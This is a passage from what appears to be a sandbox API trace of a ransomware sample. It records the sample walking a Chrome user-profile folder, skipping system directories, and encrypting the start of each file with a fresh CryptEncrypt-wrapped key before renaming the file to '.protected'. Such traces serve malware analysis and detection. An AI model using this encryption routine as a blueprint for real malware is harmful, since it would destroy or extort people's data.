Data\\Default\\QuotaManager-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager-journal.protected")) returned 1 [0084.309] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | 
out: lpFindFileData=0x295e560) returned 1 [0084.309] lstrcmpiW (lpString1="QuotaManager.protected", lpString2="Windows") returned -1 [0084.309] lstrcmpiW (lpString1="QuotaManager.protected", lpString2="Program Files") returned 1 [0084.309] lstrcmpiW (lpString1="QuotaManager.protected", lpString2="Program Files (x86)") returned 1 [0084.309] lstrcmpiW (lpString1="QuotaManager.protected", lpString2="$Recycle.bin") returned 1 [0084.309] lstrcmpiW (lpString1="QuotaManager.protected", lpString2="System Volume Information") returned -1 [0084.309] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager.protected") returned 102 [0084.309] StrStrIW (lpFirst="QuotaManager.protected", lpSrch=".protected") returned=".protected" [0084.309] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.309] lstrcmpiW (lpString1="README", lpString2="Windows") returned -1 [0084.309] lstrcmpiW (lpString1="README", lpString2="Program Files") returned 1 [0084.309] lstrcmpiW (lpString1="README", lpString2="Program Files (x86)") returned 1 [0084.309] lstrcmpiW (lpString1="README", lpString2="$Recycle.bin") returned 1 [0084.309] lstrcmpiW (lpString1="README", lpString2="System Volume Information") returned -1 [0084.309] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README") returned 86 [0084.309] StrStrIW (lpFirst="README", lpSrch=".protected") returned 0x0 [0084.309] lstrcmpW (lpString1="README", lpString2="RESTORE_FILES.txt") returned -1 [0084.309] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.309] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, 
dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README") returned 86 [0084.311] StrStrW (lpFirst="README", lpSrch=".txt") returned 0x0 [0084.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README") returned 86 [0084.311] StrStrW (lpFirst="README", lpSrch=".rar") returned 0x0 [0084.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README") returned 86 [0084.311] StrStrW (lpFirst="README", lpSrch=".zip") returned 0x0 [0084.311] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0xb4, lpOverlapped=0x0) returned 1 [0084.312] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffff4c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.312] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0xb4, lpOverlapped=0x0) returned 1 [0084.313] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.313] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.313] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.313] CloseHandle (hObject=0x154) returned 1 [0084.313] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README.protected") returned 96 [0084.313] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme.protected")) returned 1 [0084.314] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.314] lstrcmpiW (lpString1="Secure Preferences", lpString2="Windows") returned -1 [0084.314] lstrcmpiW (lpString1="Secure Preferences", lpString2="Program Files") returned 1 [0084.314] lstrcmpiW (lpString1="Secure Preferences", lpString2="Program Files (x86)") returned 1 [0084.314] lstrcmpiW (lpString1="Secure Preferences", lpString2="$Recycle.bin") returned 1 [0084.314] lstrcmpiW (lpString1="Secure Preferences", lpString2="System Volume Information") returned -1 [0084.314] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences") returned 98 [0084.314] StrStrIW (lpFirst="Secure 
Preferences", lpSrch=".protected") returned 0x0 [0084.314] lstrcmpW (lpString1="Secure Preferences", lpString2="RESTORE_FILES.txt") returned 1 [0084.314] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.314] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.314] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences") returned 98 [0084.314] StrStrW (lpFirst="Secure Preferences", lpSrch=".txt") returned 0x0 [0084.314] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences") returned 98 [0084.314] StrStrW (lpFirst="Secure Preferences", lpSrch=".rar") returned 0x0 [0084.314] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences") returned 98 [0084.314] StrStrW (lpFirst="Secure Preferences", lpSrch=".zip") returned 0x0 [0084.315] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.316] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.316] 
WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.317] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.317] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.317] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.317] CloseHandle (hObject=0x154) returned 1 [0084.317] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences.protected") returned 108 [0084.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences.protected")) returned 1 [0084.318] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.318] lstrcmpiW (lpString1="Shortcuts", lpString2="Windows") returned -1 [0084.318] lstrcmpiW (lpString1="Shortcuts", lpString2="Program Files") returned 1 [0084.318] lstrcmpiW (lpString1="Shortcuts", 
lpString2="Program Files (x86)") returned 1 [0084.318] lstrcmpiW (lpString1="Shortcuts", lpString2="$Recycle.bin") returned 1 [0084.318] lstrcmpiW (lpString1="Shortcuts", lpString2="System Volume Information") returned -1 [0084.318] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts") returned 89 [0084.318] StrStrIW (lpFirst="Shortcuts", lpSrch=".protected") returned 0x0 [0084.318] lstrcmpW (lpString1="Shortcuts", lpString2="RESTORE_FILES.txt") returned 1 [0084.318] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.318] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts") returned 89 [0084.319] StrStrW (lpFirst="Shortcuts", lpSrch=".txt") returned 0x0 [0084.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts") returned 89 [0084.319] StrStrW (lpFirst="Shortcuts", lpSrch=".rar") returned 0x0 [0084.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts") returned 89 [0084.319] StrStrW (lpFirst="Shortcuts", lpSrch=".zip") returned 0x0 [0084.319] ReadFile (in: 
hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.331] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.331] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.332] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.332] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.332] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.332] CloseHandle (hObject=0x154) returned 1 [0084.333] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts.protected") returned 99 [0084.333] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts.protected")) 
returned 1 [0084.334] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.334] lstrcmpiW (lpString1="Shortcuts-journal", lpString2="Windows") returned -1 [0084.334] lstrcmpiW (lpString1="Shortcuts-journal", lpString2="Program Files") returned 1 [0084.334] lstrcmpiW (lpString1="Shortcuts-journal", lpString2="Program Files (x86)") returned 1 [0084.334] lstrcmpiW (lpString1="Shortcuts-journal", lpString2="$Recycle.bin") returned 1 [0084.334] lstrcmpiW (lpString1="Shortcuts-journal", lpString2="System Volume Information") returned -1 [0084.334] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal") returned 97 [0084.334] StrStrIW (lpFirst="Shortcuts-journal", lpSrch=".protected") returned 0x0 [0084.334] lstrcmpW (lpString1="Shortcuts-journal", lpString2="RESTORE_FILES.txt") returned 1 [0084.334] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.334] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal") returned 97 [0084.334] StrStrW (lpFirst="Shortcuts-journal", lpSrch=".txt") returned 0x0 [0084.334] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal") returned 97 [0084.334] StrStrW (lpFirst="Shortcuts-journal", lpSrch=".rar") returned 0x0 [0084.335] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal") returned 97 [0084.335] StrStrW (lpFirst="Shortcuts-journal", lpSrch=".zip") returned 0x0 [0084.335] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.335] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.335] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.335] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.336] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.336] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.336] CloseHandle (hObject=0x154) returned 1 [0084.337] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal.protected") returned 107 [0084.337] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts-journal.protected")) returned 1 [0084.338] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.338] lstrcmpiW (lpString1="Sync Extension Settings", lpString2="Windows") returned -1 [0084.338] lstrcmpiW (lpString1="Sync Extension Settings", lpString2="Program Files") returned 1 [0084.338] lstrcmpiW (lpString1="Sync Extension Settings", lpString2="Program Files (x86)") returned 1 [0084.338] lstrcmpiW (lpString1="Sync Extension Settings", lpString2="$Recycle.bin") returned 1 [0084.338] lstrcmpiW (lpString1="Sync Extension Settings", lpString2="System Volume Information") returned -1 [0084.338] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings") returned 103 [0084.338] lstrcmpW (lpString1="Sync Extension Settings", lpString2=".") returned 1 [0084.338] lstrcmpW (lpString1="Sync Extension Settings", lpString2="..") returned 1 [0084.338] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\*") returned 105 [0084.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 
0x47bb10 [0084.339] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.339] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.339] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.339] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.339] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.339] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\.") returned 105 [0084.339] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.339] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.339] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.339] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.339] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.339] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.339] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.339] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\..") returned 106 [0084.339] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.339] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.339] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.339] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="Windows") returned -1 [0084.339] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="Program Files") returned -1 [0084.339] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="Program Files (x86)") returned -1 
[0084.339] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="$Recycle.bin") returned 1 [0084.339] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="System Volume Information") returned -1 [0084.339] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned 136 [0084.339] lstrcmpW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2=".") returned 1 [0084.339] lstrcmpW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="..") returned 1 [0084.339] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*") returned 138 [0084.339] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0084.346] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.346] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.346] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.346] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.346] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.346] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\.") returned 138 [0084.346] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.346] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: 
lpFindFileData=0x295e080) returned 1 [0084.346] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.346] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.346] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.346] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.346] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.346] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\..") returned 139 [0084.346] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.346] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.346] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.346] lstrcmpiW (lpString1="000003.log", lpString2="Windows") returned -1 [0084.346] lstrcmpiW (lpString1="000003.log", lpString2="Program Files") returned -1 [0084.346] lstrcmpiW (lpString1="000003.log", lpString2="Program Files (x86)") returned -1 [0084.346] lstrcmpiW (lpString1="000003.log", lpString2="$Recycle.bin") returned 1 [0084.346] lstrcmpiW (lpString1="000003.log", lpString2="System Volume Information") returned -1 [0084.346] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 